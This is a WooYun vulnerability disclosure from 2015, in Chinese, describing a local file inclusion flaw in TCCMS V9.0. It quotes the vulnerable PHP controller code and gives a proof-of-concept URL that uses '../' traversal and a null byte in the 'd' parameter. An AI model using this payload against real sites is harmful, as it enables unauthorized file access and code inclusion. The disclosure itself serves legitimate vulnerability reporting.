当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0104065

漏洞标题:TCCMSV9.0 最新版本地文件包含

相关厂商:teamcen.com

漏洞作者: 路人甲

提交时间:2015-03-27 15:39

修复时间:2015-06-30 15:41

公开时间:2015-06-30 15:41

漏洞类型:文件包含

危害等级:高

自评Rank:15

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-03-27: 细节已通知厂商并且等待厂商处理中
2015-04-01: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-05-26: 细节向核心白帽子及相关领域专家公开
2015-06-05: 细节向普通白帽子公开
2015-06-15: 细节向实习白帽子公开
2015-06-30: 细节向公众公开

简要描述:

RT

详细说明:

public function Run() {
        $this->Analysis();
        $this->control = $_GET['c'];
        $this->action = $_GET['a'];
        if ($_GET['a'] === "list") {
            $this->action = "listAll";
        }
        //子目录支持
        $dir = '';
        if (isset($_GET['d'])) {
        	$dir .= $_GET['d'].'/';
        }
    	$adminDir = '/controller/';
        if (defined('IN_ADMIN')) {
        	$adminDir = '/admin/';
        }
        //子模块支持
        $module = strcmp(MODULE, "/") == 0 ? 'app' : MODULE;
        $controlFile = ROOT_PATH . '/' . $module . $adminDir . $dir . $this->control . '.class.php';
        if (!file_exists($controlFile)) {
            $this->setValue("error", $this->control . Config::lang("CONTROLLERNOTEXISTS"));
            $this->forward("error.html");
            exit;
        }
        include($controlFile);
        if (!class_exists($this->control)) {
            $this->setValue("error", $this->control . Config::lang("CONTROLLERNOTDEFINED"));
            $this->forward("error.html");
            exit;
        }
        $instance = new $this->control();
        if (!method_exists($instance, $this->action)) {
            $this->setValue("error", $this->action . Config::lang("METHODNOTFIND"));
            $this->forward("error.html");
            exit;
        }
        $methodName = $this->action;
        $instance->$methodName();
    }


在这段代码中,$controlFile = ROOT_PATH . '/' . $module . $adminDir . $dir . $this->control . '.class.php';
其中发现$dir .= $_GET['d'].'/' ,而$dir并没有做任何参数过滤。最终程序执行include($controlFile)导致本地文件包含
在网站根目录下添加一个测试的txt文件:
POC:http://192.168.152.160/tccms/index.php?d=../../1.txt%00

BaiduHi_2015-3-26_23-36-17.png

漏洞证明:

在网站根目录下添加一个测试的txt文件:
POC:http://192.168.152.160/tccms/index.php?d=../../1.txt%00

BaiduHi_2015-3-26_23-36-17.png

修复方案:

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-30 15:41

厂商回复:

最新状态:

暂无